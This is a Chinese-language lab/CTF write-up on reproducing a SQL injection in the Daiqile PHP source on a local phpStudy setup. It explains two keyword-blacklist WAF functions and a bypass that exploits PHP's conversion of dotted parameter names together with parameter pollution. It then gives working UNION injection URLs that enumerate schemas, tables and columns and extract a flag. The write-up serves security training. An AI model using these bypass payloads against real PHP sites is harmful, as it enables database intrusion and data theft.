贷齐乐漏洞复现+php特性绕过WAF

目录

一、环境搭建

1.将贷齐乐源码放入phpstudy中的www目录下

2.在phpstudy上创建网站:

3.在本地数据库中创建数据库--ctf,并创建users表:

4.往表中插入数据:

5.查看users表:

6.测试能否访问到数据库

二、源码分析

1.WAF1:

2.WAF2:

3.php特性:

4.绕过方法:

三、联合注入

1.找注入点:空格被过滤所以用/**/来代替空格

2.爆库名:

3.通过limit来一个一个显示数据库名:

4.爆表名:

5.查字段名

6.得到flag


一、环境搭建

1.将贷齐乐源码放入phpstudy中的www目录下

2.在phpstudy上创建网站:

注意db.inc.php中数据库信息要与本地数据库一致

<?php

$mysql_server_name="localhost";

$mysql_database="ctf";    /** 数据库的名称 */

$mysql_username="root";  /** MySQL数据库用户名 */

$mysql_password="123456";  /** MySQL数据库密码 */

$conn = mysqli_connect($mysql_server_name, $mysql_username,$mysql_password,$mysql_database);

?>

3.在本地数据库中创建数据库--ctf,并创建users表:

CREATE DATABASE ctf

use ctf
CREATE TABLE `users` (
  `Id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) DEFAULT NULL,
  `pass` varchar(255) DEFAULT NULL,
  `flag` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8

4.往表中插入数据:

mysql> INSERT INTO `users` (`name`, `pass`, `flag`) VALUES ('admin', 'admin', 'hrctf{R3qeeeee_Is_1nterEst1ng}');

5.查看users表:

6.测试能否访问到数据库

二、源码分析

1.WAF1:

包含点,单引号,星号等等,一旦包含直接删除非法字符,然后又注释掉了一系列东西

 function dhtmlspecialchars($string) {
      if (is_array($string)) {
          foreach ($string as $key => $val) {
              $string[$key] = dhtmlspecialchars($val);
          }
      }
      else {
          $string = str_replace(array('&', '"', '<', '>', '(', ')'), array('&amp;', '&quot;', '&lt;', '&gt;', '(', ')'), $string);
          if (strpos($string, '&amp;#') !== false) {
              $string = preg_replace('/&amp;((#(\d{3,5}|x[a-fA-F0-9]{4}));)/', '&\\1', $string);
          }
      }
      return $string;

2.WAF2:

GET/POST/REQUEST/COOKIE都会经过这个替换str_replace(array('&', '"', '<', '>','(',')'), array('&', '"', '<', '>','(',')'), $string),

这个替换最明显的效果,就是所有的英文括号都变成中文括号,导致user(),database()等无法执

function dowith_sql($str) {
      $check = preg_match('/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile/is', $str);
      if ($check) {
          echo "非法字符!";
          exit();
      }
      return $str;
  }

在我们的第一道WAF之后进行的,假设我们有一个方法让第一道WAF认为请求中没有恶意字符,再通过这里的覆盖,将恶意字符引入$_REQUEST中,就可以造成WAF的绕过了。

3.php特性:

1**.当我们输入两个相同名字的参数的时候,php是取后一个的。----php全局污染**

2.php另一个特性,自身在解析请求的时候,如果参数名字中包含" "、"."、"["这几个字符,会将他们转换成下划线。

4.绕过方法:

假设我发送的是这样一个请求:i_d=1&i.d=2 ,php先将i.d转换成i_d,即为i_d=1&i_d=2 ,再获取到的$_REQUEST['i_d']就是2。

可在_SERVER\['REQUEST_URI'\]中,i_d和i.d却是两个完全不同的参数名,那么切割覆盖后,获取的_REQUEST['i_d']却是1。

1、hpp php 只接收同名参数的最后一个,这个也涉及hpp全局参数污染。

2、php中会将get传参中的key中的.转为_

3、$_REQUEST 遵循php接收方式,i_d&i.d中的最后一个参数的转换为下划线然后接收,所以我们的正常代码放在第二个参数,waf失效。

三、联合注入

通过对源码的解读,可见过滤了很多东西,比如空格、括号、单引号等等,那么在接下来的注入中,我们需要合理的去绕过这些waf。由于括号被注释掉了,所以可以使用联合注入。

1.找注入点:空格被过滤所以用/**/来代替空格

http://127.0.0.1:8081/index.php/?i_d=-1/**/union/**/select/**/1,2,3&i.d=1&submit=1

在第二个字段进行的回显,所以我们就在第二个字段进行注入

2.爆库名:

http://127.0.0.1:8081/index.php/?i_d=-1/**/union/**/select/**/1,table_schema,3,4/**/from/**/information_schema.tables&i.d=1&submit=1

3.通过limit来一个一个显示数据库名:

http://127.0.0.1:8081/index.php/?i_d=-1/**/union/**/select/**/1,table_schema,3,4/**/from/**/information_schema.tables/**/limit/**/3,1&i.d=1&submit=1

4.爆表名:

http://127.0.0.1:8081/index.php/?i_d=-1/**/union/**/select/**/1,table_name,3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/0x637466/**/limit/**/0,1&i.d=1&submit=1

由于等号被截断了,所以使用like进行替换,同时传入数据库中的内容使用十六进制进行了替换

5.查字段名

http://127.0.0.1:8081/index.php/?&i_d=-1/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273/**/limit/**/3,1&i.d=1&submit=1

6.得到flag

http://127.0.0.1:8081/index.php/?&i_d=-1/**/union/**/select/**/1,flag,3,4/**/from/**/ctf.users&i.d=1&submit=1
相关推荐
蜗牛hb2 小时前
VMware Workstation虚拟机网络模式
开发语言·学习·php
手可摘星河2 小时前
php中 cli和cgi的区别
开发语言·php
EasyDSS3 小时前
国标GB28181-2022平台EasyGBS:安防监控中P2P的穿透方法
网络协议·php·音视频·p2p
liuyunshengsir5 小时前
Squid代理服务器的安装使用
开发语言·php
007php00714 小时前
Go语言zero项目部署后启动失败问题分析与解决
java·服务器·网络·python·golang·php·ai编程
卜及中17 小时前
【Linux】资源隔离机制 — 命名空间(Namespace)详解
linux·服务器·php
m0_5485147718 小时前
2024.12.10——攻防世界Web_php_include
android·前端·php
网络安全King19 小时前
网络安全 - SQL Injection
sql·web安全·php
图图爱上壮壮妈20 小时前
PHP中实现拓扑算法
开发语言·算法·php
H轨迹H1 天前
#渗透测试 kioptix level 2靶机通关教程及提权
网络安全·渗透测试·oscp